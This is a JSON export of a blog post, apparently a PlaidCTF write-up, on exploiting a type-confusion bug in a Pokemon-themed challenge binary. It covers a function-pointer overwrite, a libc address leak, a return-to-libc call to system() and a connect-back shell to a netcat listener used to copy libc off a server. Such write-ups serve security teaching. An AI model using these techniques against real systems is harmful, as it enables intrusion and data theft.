{"id":4,"date":"2014-01-03T09:46:57","date_gmt":"2014-01-03T09:46:57","guid":{"rendered":"http:\/\/piratesecurityblog.com\/?p=4"},"modified":"2016-09-28T09:48:18","modified_gmt":"2016-09-28T09:48:18","slug":"plaidctf-writeup-for-pwn-275-kappa-type-confusion-vuln","status":"publish","type":"post","link":"https:\/\/piratesecurityblog.com\/?p=4","title":{"rendered":"PlaidCTF writeup for Pwn-275 \u2013 Kappa (type confusion vuln)"},"content":{"rendered":"

This is my last writeup for PlaidCTF<\/a>! You can get a list of all my writeups here<\/a>. Kappa is a 275-point pwnable level called Kappa, and the goal is to capture a bunch of Pokemon and make them battle each other!<\/p>\n

Ultimately, this issue came down to a type-confusion bug that let us read memory and call arbitrary locations. Let’s see why!
\n<\/span><\/p>\n

The setup<\/h2>\n

When you run Kappa<\/a>, you get a Pokemon interface:<\/p>\n

Thank you for helping test CTF plays Pokemon! Keep in mind that this is currently in alpha which means that we will only support one person playing at a time. You will be provided with several options once the game begins, as well as several hidden options for those true CTF Plays Pokemon fans ;). We hope to expand this in the coming months to include even more features!  Enjoy! :)\r\nChoose an Option:\r\n1. Go into the Grass\r\n2. Heal your Pokemon\r\n3. Inpect your Pokemon\r\n4. Release a Pokemon\r\n5. Change Pokemon artwork\r\n<\/pre>\n
If you go into the grass, you can capture a Pokemon:<\/p>\n
1   \r\nYou walk into the tall grass!\r\n.\r\n.\r\n.\r\nYou failed to find any Pokemon!\r\nChoose an Option:\r\n1. Go into the Grass\r\n2. Heal your Pokemon\r\n3. Inpect your Pokemon\r\n4. Release a Pokemon\r\n5. Change Pokemon artwork\r\n\r\n1\r\nYou walk into the tall grass!\r\n.\r\n.\r\n.\r\nA wild Kakuna appears!\r\nChoose an Option:\r\n1. Attack\r\n2. Throw Pokeball\r\n3. Run\r\n2\r\nYou throw a Pokeball!\r\nYou successfully caught Kakuna!\r\nWhat would you like to name this Pokemon?\r\nPOKEMON1\r\nChoose an Option:\r\n1. Go into the Grass\r\n2. Heal your Pokemon\r\n3. Inpect your Pokemon\r\n4. Release a Pokemon\r\n5. Change Pokemon artwork\r\n<\/pre>\n
…And so on.<\/p>\n
It’s worth noting that each of those periods represents a second of waiting. Thus, the first thing to do is to get rid of sleep():<\/p>\n
@@ -1,5 +1,5 @@<\/span>\r\n\r\n-kappa:     file format elf32-i386<\/span>\r\n+kappa-fixed:     file format elf32-i386<\/span>\r\n\r\n\r\n Disassembly of section .interp:\r\n@@ -1077,19 +1077,35 @@<\/span>\r\n  8048de9:      c7 04 24 74 98 04 08    mov    DWORD PTR [esp],0x8049874\r\n  8048df0:      e8 9b f7 ff ff          call   8048590 <puts@plt>\r\n  8048df5:      c7 04 24 01 00 00 00    mov    DWORD PTR [esp],0x1\r\n- 8048dfc:      e8 5f f7 ff ff          call   8048560 <sleep@plt><\/span>\r\n+ 8048dfc:      90                      nop<\/span>\r\n+ 8048dfd:      90                      nop<\/span>\r\n+ 8048dfe:      90                      nop<\/span>\r\n+ 8048dff:      90                      nop<\/span>\r\n+ 8048e00:      90                      nop<\/span>\r\n  8048e01:      c7 04 24 92 98 04 08    mov    DWORD PTR [esp],0x8049892\r\n  8048e08:      e8 83 f7 ff ff          call   8048590 <puts@plt>\r\n  8048e0d:      c7 04 24 01 00 00 00    mov    DWORD PTR [esp],0x1\r\n- 8048e14:      e8 47 f7 ff ff          call   8048560 <sleep@plt><\/span>\r\n+ 8048e14:      90                      nop<\/span>\r\n+ 8048e15:      90                      nop<\/span>\r\n+ 8048e16:      90                      nop<\/span>\r\n+ 8048e17:      90                      nop<\/span>\r\n+ 8048e18:      90                      nop<\/span>\r\n  8048e19:      c7 04 24 92 98 04 08    mov    DWORD PTR [esp],0x8049892\r\n  8048e20:      e8 6b f7 ff ff          call   8048590 <puts@plt>\r\n  8048e25:      c7 04 24 01 00 00 00    mov    DWORD PTR [esp],0x1\r\n\r\n<\/pre>\n
…and so on<\/p>\n
Types, types, types<\/h2>\n
There are three types of Pokemon in the game: Bird Jesus, Kakuna, and Charizard. You can have up to four Pokemon captured at the same time. There is an array of the Pokemon types:<\/p>\n
.bss<\/span>:0804BFC0<\/span> pokemon_types<\/span>   dd<\/span> 5<\/span> dup<\/span>(?)             ; DATA XREF: sub_8048960+219w<\/span>\r\n.bss<\/span>:0804BFC0<\/span>                                         ; do_heal_pokemon_real+20r ...<\/span>\r\n.bss<\/span>:0804BFC0<\/span>                                         ; A list of pokemon types, 1 2 or 3<\/span>\r\n<\/pre>\n
…and also an array of pointers to the actual Pokemon:<\/p>\n
.bss<\/span>:0804BFAC<\/span> pokemon_pointers<\/span> dd<\/span> 5<\/span> dup<\/span>(?)            ; DATA XREF: list_pokemon+1Er<\/span>\r\n.bss<\/span>:0804BFAC<\/span>                                         ; list_pokemon+2Cr ...<\/span>\r\n                                                      ; A list of pointers to the captured Pokemon<\/span>\r\n<\/pre>\n
The structures for each Pokemon type are also different, and this is really the key:<\/p>\n
00000000<\/span> pokemon_type_1<\/span>  struc<\/span> ; (sizeof=0x888)<\/span>\r\n00000000<\/span> name<\/span>            db<\/span> 15<\/span> dup<\/span>(?)\r\n0000000F<\/span> artwork<\/span>         db<\/span> 2153<\/span> dup<\/span>(?)\r\n00000878<\/span> health<\/span>          dd<\/span> ?                    ; XREF: do_heal_pokemon_real+5Bw ; max = 100<\/span>\r\n0000087C<\/span> attack_power<\/span>    dd<\/span> ?\r\n00000880<\/span> actions<\/span>         dd<\/span> ?\r\n00000884<\/span> function_status<\/span> dd<\/span> ?                    ; XREF: do_inspect_pokemon+79r<\/span>\r\n00000888<\/span> pokemon_type_1<\/span>  ends<\/span>\r\n\r\n00000000<\/span> pokemon_type_2<\/span>  struc<\/span> ; (sizeof=0x214)<\/span>\r\n00000000<\/span> name<\/span>            db<\/span> 15<\/span> dup<\/span>(?)\r\n0000000F<\/span> artwork<\/span>         db<\/span> 501<\/span> dup<\/span>(?)\r\n00000204<\/span> health<\/span>          dd<\/span> ?                    ; XREF: do_heal_pokemon_real+80w<\/span>\r\n00000208<\/span> attack_power<\/span>    dd<\/span> ?\r\n0000020C<\/span> actions<\/span>         dd<\/span> ?\r\n00000210<\/span> function_status<\/span> dd<\/span> ?                    ; XREF: do_inspect_pokemon+A9r<\/span>\r\n00000214<\/span> pokemon_type_2<\/span>  ends<\/span>\r\n\r\n00000000<\/span> pokemon_type_3<\/span>  struc<\/span> ; (sizeof=0x5FC)<\/span>\r\n00000000<\/span> name<\/span>            db<\/span> 15<\/span> dup<\/span>(?)            ; XREF: initialize_bird_jesus+18w<\/span>\r\n0000000F<\/span> artwork<\/span>         db<\/span> 1501<\/span> dup<\/span>(?)          ; XREF: initialize_bird_jesus+32o<\/span>\r\n000005EC<\/span> health<\/span>          dd<\/span> ?                    ; XREF: do_heal_pokemon_real+36w<\/span>\r\n000005EC<\/span>                                         ; initialize_bird_jesus+55w<\/span>\r\n000005F0<\/span> attack_power<\/span>    dd<\/span> ?                    ; XREF: initialize_bird_jesus+62w<\/span>\r\n000005F4<\/span> actions<\/span>         dd<\/span> ?                    ; XREF: initialize_bird_jesus+48w<\/span>\r\n000005F8<\/span> function_status<\/span> dd<\/span> ?                    ; XREF: do_inspect_pokemon+49r<\/span>\r\n000005F8<\/span>                                         ; initialize_bird_jesus+6Fw<\/span>\r\n000005FC<\/span> pokemon_type_3<\/span>  ends<\/span>\r\n<\/pre>\n
The three important fields are artwork<\/tt>, which is a differently sized array for each type, as well as actions<\/tt> and function_status<\/tt>. function_status<\/tt> is particular important, because it’s a function pointer to the function that displays the Pokemon’s status. And function pointers are fun. \ud83d\ude42<\/p>\n
Type confusion<\/h2>\n
Now, this is where the vulnerability happens. When you capture your sixth Pokemon, it no longer fits in the static 5-element array and asks you to replace one of your old ones:<\/p>\n
What would you like to name this Pokemon?\r\nchar\r\nCaught char\r\nOh no! you don't have any more room for a Pokemon! Choose a Pokemon to replace!\r\nChoose a Pokemon!\r\n1. Bird Jesus\r\n2. Kack1\r\n3. Kack2\r\n4. Kack3\r\n5. Kack4\r\n<\/pre>\n
The problem is, when a Pokemon updates a Pokemon of another type, it forgets to update the type array<\/em>, and therefore thinks the Pokemon is of the wrong type! Since each type has a different structure, it means that Bad Stuff happens! If we change out a Pokemon then try to display it, this happens:<\/p>\n
What would you like to name this Pokemon?\r\nchar\r\nCaught char\r\nOh no! you don't have any more room for a Pokemon! Choose a pokemon to replace!\r\nChoose a Pokemon!\r\n1. Bird Jesus\r\n2. Kack1\r\n3. Kack2\r\n4. Kack3\r\n5. Kack4\r\n2\r\n\r\nChoose an Option:\r\n1. Go into the Grass\r\n2. Heal your Pokemon\r\n3. Inpect your Pokemon\r\n4. Release a Pokemon\r\n5. Change Pokemon artwork\r\n\r\n3\r\nHere are all of the stats on your current Pokemon!\r\nName: Bird Jesus\r\n                   ..-`\"-._\r\n                 ,'      ,'`.\r\n               ,f \\   . \/ ,-'-.\r\n              '  `. | |  , ,'`|\r\n             `.-.  \\| | ,.' ,-.\\\r\n              \/| |. ` | \/.'\"||Y .\r\n             . |_|U_\\.|\/\/_U_||. |\r\n             | j    \/   .    \\ |'\r\n              L    \/     \\    .j`\r\n               .  `\"`._,--|  \/\/  \\\r\n               j   `.   ,'  , \\   L\r\n          ____\/      `\"'     \\ L  |\r\n       ,-'   ,'               \\|'-+.\r\n      \/    ,'                  .    \\\r\n     \/    \/                     `    `.\r\n    . |  j                       \\     \\\r\n    |F   |                        '   \\ .\r\n    ||  F                         |   |\\|\r\n    ||  |                         |   | |\r\n    ||  |                         |   | |\r\n    `.._L                         |  ,' '\r\n     .   |                        |,| ,'\r\n      `  |                    '|||  j\/\r\n       `.'    .             ,'   \/  '\r\n         \\\\    `._        ,'    \/ ,'\r\n          .\\         ._ ,'     \/,'\r\n            .  ,   .'| \\  (   \/\/\r\n            j_|'_,'  |  ._'` \/ `.\r\n           ' |  |    |   |  Y    `.\r\n    ,.__  `; |  |-\"\"\"^\"\"\"'  |.--\"\"`\r\n ,--\\   \"\"\" ,    \\  \/ \\ ,-     \"\"\"\"---.\r\n'.--`v.=:.-'  .  L.\"`\"'\"\\   ,  `.,.._ \/`.\r\n     .L    j-\"`.   `\\    j  |`.  \"'--\"\"`-'\r\n     \/ |_,'    L ,-.|   (\/`.)  `-\\.-'\\\r\n    `-\"\"        `. |     l \/     `-\"`-'\r\n                  `      `- mh\r\n\r\nCurrent Health: 960\r\nAttack Power: 20\r\nAttack: Gust\r\nSegmentation fault (core dumped)\r\n<\/pre>\n
Where did it crash?<\/p>\n
Core was generated by `.\/kappa-fixed'.\r\nProgram terminated with signal 11, Segmentation fault.\r\n#0  0x22272020 in ?? ()\r\n<\/pre>\n
0x22272020? That looks like ascii!<\/p>\n
$ echo -ne '\\x20\\x20\\x27\\x22'\r\n  '\"\r\n<\/pre>\n
Space, space, single quote, double quote. That looks suspiciously like the ascii art we see above! And, in fact, it is! The artwork<\/tt> pointer of the Charizard we just caught overwrote the function_status<\/tt> pointer of the next Pokemon. Then, when we attempted to call function_status<\/tt>, it called some ascii art and crashed.<\/p>\n
Here’s what the memory layout is, essentially:<\/p>\n
          [lower addresses]                                                     [higher addresses]\r\n          +--------------------------------------------------------------------------------------+\r\nKakuna:   |name|artworkar|health|power|actions|fcn_status| [...]                                 |\r\n          +----+---------+------+-----+-------+----------+---------------------------------------+\r\n          +----+---------+------+-----+-------+-----------+------+-----+-------+----------+------+\r\nCharizard:|name|artworkartworkartworkartworkartworkartwork|health|power|actions|fcn_status| [...]|\r\n          +----+------------------------------------------+------+-----+-------+----------+------+\r\n          [lower addresses]                                                     [higher addresses]\r\n<\/pre>\n
When the Kakuna is replaced by a Charizard, the program still thinks that the Pokemon is a charizard. Then, when it calls fcn_status(), it’s actually calling an address pointer read from the artwork. If you look at the diagram above, you’ll see that the same place that Kakuna stores its fcn_status pointer, Charizard stores its artwork.<\/p>\n
The best part is, we can change the artwork! And therefore, we can change what Kakuna thinks is the function pointer! Check this out:<\/p>\n
Choose an Option:\r\n1. Go into the Grass\r\n2. Heal your Pokemon\r\n3. Inpect your Pokemon\r\n4. Release a Pokemon\r\n5. Change Pokemon artwork\r\n\r\n5\r\nChoose a Pokemon!\r\n1. Bird Jesus\r\n2. char\r\n\r\n3. 1\r\n\r\n4. 1\r\n\r\n5. 1\r\n\r\n2\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n\r\nI'm sure you'll love to show this new art to your friends!\r\n\r\nChoose an Option:\r\n1. Go into the Grass\r\n2. Heal your Pokemon\r\n3. Inpect your Pokemon\r\n4. Release a Pokemon\r\n5. Change Pokemon artwork\r\n\r\n3\r\nHere are all of the stats on your current Pokemon!\r\nName: Bird Jesus\r\n\r\n[...ascii art...]\r\n\r\nCurrent Health: 960\r\nAttack Power: 20\r\nAttack: Gust\r\nSegmentation fault (core dumped)\r\n\r\n$ gdb -q .\/kappa-fixed .\/core\r\nCore was generated by `.\/kappa-fixed'.\r\nProgram terminated with signal 11, Segmentation fault.\r\n#0  0x41414141 in ?? ()\r\n(gdb)\r\n<\/pre>\n
Sure enough, we can control the call (and therefore EIP) by overwriting the function pointer!<\/p>\n
The deep blue libc<\/h2>\n
All right, we have EIP control, but that was only half the time I spent on this level! The other half was trying to figure out what to do with libc. Basically, I can cause a crash here:<\/p>\n
.text<\/span>:08049075<\/span>                 mov<\/span>     [esp<\/span>], edx<\/span>\r\n.text<\/span>:08049078<\/span>                 call<\/span>    eax<\/span>\r\n<\/pre>\n
Where ‘edx’ is a pointer to the full structure\u2014the name, etc.\u2014and eax is fully controlled. That means we can call an arbitrary function and pass an arbitrary string value as the first parameter. system(), anyone?<\/p>\n
The first thing we tried was jumping to the heap. Suffice to say, that failed. So we had to be more clever and use a return-into-libc attack. The problem was, we didn’t know where libc was!<\/p>\n
Remember earlier when I said that actions<\/tt> was an important field? Well, the actions<\/tt> field, normally, is a pointer to the action that the Pokemon can take. Did you see under Bird Jesus’s status where it said Attack: Gust<\/tt>? Well, that’s reading a string pointed to by our struct. By using the same overflow we were using before, we can change where it reads that string from!<\/p>\n
To put a kink in it, it’s actually dereferenced before being read. Which means that whatever we point it to will be dereferenced then printed. So, it’s a pointer to a string pointer. Meaning we can only read memory if we have a pointer to it!<\/p>\n
For our attack, we need a pointer to libc. Luckily, we have the ever-handy Program Relocation Table sitting around, with calls such as this:<\/p>\n
.plt<\/span>:08048510<\/span> _read<\/span>           proc<\/span> near<\/span>               ; CODE XREF: sub_8048960+1DCp<\/span>\r\n.plt<\/span>:08048510<\/span>                                         ; do_change_artwork+5A6p<\/span>\r\n.plt<\/span>:08048510<\/span>                 jmp<\/span>     ds<\/span>:off_804AEB4<\/span>\r\n.plt<\/span>:08048510<\/span> _read<\/span>           endp<\/span>\r\n<\/pre>\n
The machine code for making that jump is actually FF 25 B8 AE 04 08. The last 4 bytes\u2014B8 AE 04 08\u2014refer to the address 0x0804aeb8. That address, in turn, stores the actual relocation address of the read() libc call! We chose read() because it happened to be the first one, and it just happened to be the one we grabbed. We could just of easily have used printf() or any other libc function.<\/p>\n
To rephrase all that, we can set the Pokemon’s action to a pointer to a string pointer. If we use 0x08048510+2, then we’re setting it to a pointer to 0x804AEB4, which in turn is the read() libc call. Then when it tries to print, it’s going to print the address of read() (and also printf() and some other functions) as a string, until it reaches a NUL byte!<\/p>\n
Here’s what it looks like:<\/p>\n
...\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAE\r\nCurrent Health: 69\r\nAttack Power: 9999\r\nAttack: P l\\xB7\\xB0\\xC3d\\xB7@Hg\\xB70\\x98g\\xB7 Df\\xB7f\\x85\r\nName: Kack2\r\n...\r\n<\/pre>\n
Remember the series of ‘A’s is the altered artwork. And “P l\\xb7” works out to “50 20 6c b7”, or “0xb76c2050”, a perfectly reasonable pointer to a libc function!<\/p>\n
Pwnage<\/h2>\n
All right, we’re just about done! We have an offset for libc’s read() function, but what about system()?<\/p>\n
This is where we cheated a bit. And by cheated, I mean use a common CTF technique: We stole a copy of libc from ezhp<\/a>‘s level!<\/p>\n
To do this, I re-exploited ezhp, and used connect-back shellcode to netcat that I had running. The netcat was logging into a file using the “tee” program:<\/p>\n
nc<\/span> -vv<\/span> -l<\/span> -p<\/span> 55555<\/span> | tee libc.hex<\/span>\r\n<\/pre>\n
Then once I’d exploited ezhp and gotten a shell back on that netcat instance, I used ‘ldd’ on ezhp’s binary to find libc:<\/p>\n
ldd<\/span> ezhp<\/span>\r\n        linux<\/span>-gate<\/span>.so<\/span>.1<\/span> =>  (0xb7759000<\/span>)\r\n        libc<\/span>.so<\/span>.6<\/span> => \/lib<\/span>\/i686<\/span>\/cmov<\/span>\/libc<\/span>.so<\/span>.6<\/span> (0xb7600000<\/span>)\r\n        \/lib<\/span>\/ld<\/span>-linux<\/span>.so<\/span>.2<\/span> (0xb775a000<\/span>)\r\n<\/pre>\n
Then printed libc.so.6 out in hex:<\/p>\n
xxd -g1 \/lib\/i686\/cmov\/libc.so.6 | head\r\n0000000: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00  .ELF............\r\n0000010: 03 00 03 00 01 00 00 00 00 6e 01 00 34 00 00 00  .........n..4...\r\n0000020: fc 36 14 00 00 00 00 00 34 00 20 00 0a 00 28 00  .6......4. ...(.\r\n0000030: 45 00 44 00 06 00 00 00 34 00 00 00 34 00 00 00  E.D.....4...4...\r\n0000040: 34 00 00 00 40 01 00 00 40 01 00 00 05 00 00 00  4...@...@.......\r\n...\r\n<\/pre>\n
Then terminated the connection.<\/p>\n
At this point, I had a fairly dirty libc.hex file. I opened it up in vim, removed everything except the hexdump, and saved it. Then I converted it back to binary:<\/p>\n
xxd<\/span> -r<\/span> < libc<\/span>.hex<\/span> > libc<\/span>.so<\/span>.6<\/span>\r\n<\/pre>\n
And now I had a pretty typical libc.so copy from the server, and sure enough it was right! Once I had it, I calculated the offset between read() and system(), which turned out to be 0x8b500 bytes.<\/p>\n
I then used the following pseudo-code:<\/p>\n
return_address<\/span> = read_address<\/span> - 0x8b500<\/span>\r\n<\/pre>\n
to calculate the return address. I set the name of my Pokemon to the command I wanted to run (since the name is the first argument passed into the function). And I ran it!<\/p>\n
Because the name of the Pokemon was limited to 15 characters, I ended up using the command ls -lR \/<\/tt> to find the flag, which gave me a 2.8mb directory listing of the server:<\/p>\n
$ ls<\/span> -lh<\/span> dirlisting<\/span>.txt<\/span>\r\n-rw<\/span>-r<\/span>--r<\/span>-- 1<\/span> ron<\/span> ron<\/span> 2<\/span>.8<\/span>M<\/span> Apr<\/span> 12<\/span> 22<\/span>:47<\/span> dirlisting<\/span>.txt<\/span>\r\n<\/pre>\n
Which turned out to be in \/home\/kappa\/flag. Then, I printed it out using “cat ~kappa\/f*”.<\/p>\n
And that was it!<\/p>\n
Conclusion<\/h2>\n
So basically, we could cause the program to mix up the structure types. We used that to create an arbitrary indirect read, which we used to find the read() function, and therefore the system() function. Armed with that, we used the structure mix up to overwrite a function pointer and call system() with arbitrary commands!<\/p>\n","protected":false},"excerpt":{"rendered":"
This is my last writeup for PlaidCTF! You can get a list of all my writeups here. Kappa is a 275-point pwnable level called Kappa, and the goal is to capture a bunch of Pokemon and make them battle each other! Ultimately, this issue came down to a type-confusion bug that let us read memory … Continue reading PlaidCTF writeup for Pwn-275 \u2013 Kappa (type confusion vuln)<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[2],"tags":[3,4],"_links":{"self":[{"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts\/4"}],"collection":[{"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4"}],"version-history":[{"count":1,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts\/4\/revisions"}],"predecessor-version":[{"id":5,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts\/4\/revisions\/5"}],"wp:attachment":[{"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}